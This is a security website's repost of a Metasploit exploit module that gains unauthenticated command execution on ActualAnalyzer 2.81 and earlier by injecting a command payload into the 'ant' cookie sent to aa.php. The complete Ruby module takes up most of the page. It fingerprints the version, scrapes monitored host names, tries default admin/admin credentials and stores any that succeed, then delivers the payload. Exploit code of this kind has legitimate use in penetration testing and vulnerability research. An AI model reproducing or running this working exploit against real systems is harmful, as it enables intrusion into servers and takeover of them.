首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ActualAnalyzer Cookie Command Execution Vulnerability
来源:metasploit.com 作者:Coles 发布时间:2014-12-16  
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
      'Description'     => %q{
        This module exploits a command execution vulnerability in
        ActualAnalyzer version 2.81 and prior.
  
        The 'aa.php' file allows unauthenticated users to
        execute arbitrary commands in the 'ant' cookie.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Benjamin Harris', # Discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'      =>
        [
          ['EDB', '34450'],
          ['OSVDB', '110601']
        ],
      'Payload'         =>
        {
          'Space'       => 4096, # HTTP cookie
          'DisableNops' => true,
          'BadChars'    => "\x00"
        },
      'Arch'            => ARCH_CMD,
      'Platform'        => 'unix',
      'Targets'         =>
        [
          # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
          ['ActualAnalyzer <= 2.81', { 'auto' => true }]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => 'Aug 28 2014',
      'DefaultTarget'   => 0))
  
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
        OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
        OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
      ], self.class)
  end
  
  #
  # Checks if target is running ActualAnalyzer <= 2.81
  #
  def check
    # check for aa.php
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
    if !res
      vprint_error("#{peer} - Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error("#{peer} - Could not find aa.php")
      return Exploit::CheckCode::Safe
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
      vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.")
      return Exploit::CheckCode::Detected
    end
    # check version
    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
    if !res
      vprint_error("#{peer} - Connection failed")
      return Exploit::CheckCode::Unknown
    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
      vprint_status("#{peer} - Found version: #{version}")
      if Gem::Version.new(version) <= Gem::Version.new('2.81')
        report_vuln(
          host: rhost,
          name: self.name,
          info: "Module #{fullname} detected ActualAnalyzer #{version}",
          refs: references,
        )
        return Exploit::CheckCode::Vulnerable
      end
      return Exploit::CheckCode::Detected
    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Safe
  end
  
  #
  # Try to retrieve a valid analytics host from view.php unauthenticated
  #
  def get_analytics_host_view
    analytics_host = nil
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'view.php'),
      'vars_post' => {
        'id_h' => '',
        'listp' => '',
        'act_h' => 'vis_int',
        'oldact' => 'vis_grpg',
        'tint_h' => '',
        'extact_h' => '',
        'home_pos' => '',
        'act' => 'vis_grpg',
        'tint' => 'total',
        'grpg' => '201',
        'cp_vst' => 'on',
        'cp_hst' => 'on',
        'cp_htst' => 'on',
        'cp_reps' => 'y',
        'tab_sort' => '1_1'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on view.php")
    end
    nil
  end
  
  #
  # Try to retrieve a valid analytics host from code.php unauthenticated
  #
  def get_analytics_host_code
    analytics_host = nil
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'code.php'),
      'vars_get' => {
        'pid' => '1'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on code.php")
    end
    nil
  end
  
  #
  # Try to retrieve a valid analytics host from admin.php with creds
  #
  def get_analytics_host_admin
    analytics_host = nil
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin.php'),
      'vars_post' => {
        'uname' => user,
        'passw' => pass,
        'id_h' => '',
        'listp' => '',
        'act_h' => '',
        'oldact' => 'pages',
        'tint_h' => '',
        'extact_h' => '',
        'param_h' => '',
        'param2_h' => '',
        'home_pos' => '',
        'act' => 'dynhtml',
        'set.x' => '11',
        'set.y' => '11'
      }
    )
    if !res
      vprint_error("#{peer} - Connection failed")
    elsif res.code == 200 && res.body =~ />Login</
      vprint_status("#{peer} - Login failed.")
    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
      print_good("#{peer} - Login successful! (#{user}:#{pass})")
      service_data = {
        address: Rex::Socket.getaddress(rhost, true),
        port: rport,
        service_name: (ssl ? 'https' : 'http'),
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }
      credential_data = {
        origin_type: :service,
        module_fullname: fullname,
        private_type: :password,
        private_data: pass,
        username: user
      }
      credential_data.merge!(service_data)
      credential_core = create_credential(credential_data)
      login_data = {
        core: credential_core,
        last_attempted_at: DateTime.now,
        status: Metasploit::Model::Login::Status::SUCCESSFUL
      }
      login_data.merge!(service_data)
      create_credential_login(login_data)
      return analytics_host
    else
      vprint_status("#{peer} - Could not find any hosts on admin.php")
    end
    nil
  end
  
  def execute_command(cmd, opts = { analytics_host: vhost })
    vuln_cookies = %w(anw anm)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'aa.php'),
      'vars_get' => { 'anp' => opts[:analytics_host] },
      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
    )
    if !res
      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
      print_good("#{peer} - Payload sent successfully")
      return true
    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
    else
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
    nil
  end
  
  def exploit
    return unless check == Exploit::CheckCode::Vulnerable
    analytics_hosts = []
    if datastore['ANALYZER_HOST'].blank?
      analytics_hosts << get_analytics_host_code
      analytics_hosts << get_analytics_host_view
      analytics_hosts << get_analytics_host_admin
      analytics_hosts << vhost
      analytics_hosts << '127.0.0.1'
      analytics_hosts << 'localhost'
    else
      analytics_hosts << datastore['ANALYZER_HOST']
    end
    analytics_hosts.uniq.each do |host|
      next if host.nil?
      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
      break if execute_command(payload.encoded, analytics_host: host)
    end
  end
end
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·tnftp - clientside BSD Exploit
·phpMyAdmin 4.0.x, 4.1.x, 4.2.x
·Wordpress Download Manager 2.7
·HTCSyncManager 3.1.33.0 - Serv
·Tuleap PHP Unserialize Code Ex
·Avira 14.0.7.342 - (avguard.ex
·WordPress WP Symposium 14.11 S
·CodeMeter 4.50.906.503 - Servi
·Advantech AdamView 4.30.003 -
·ProjectSend r-561 - Arbitrary
·VFU 4.10-1.1 - Buffer Overflow
·Jaangle 0.98i.977 Denial Of Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved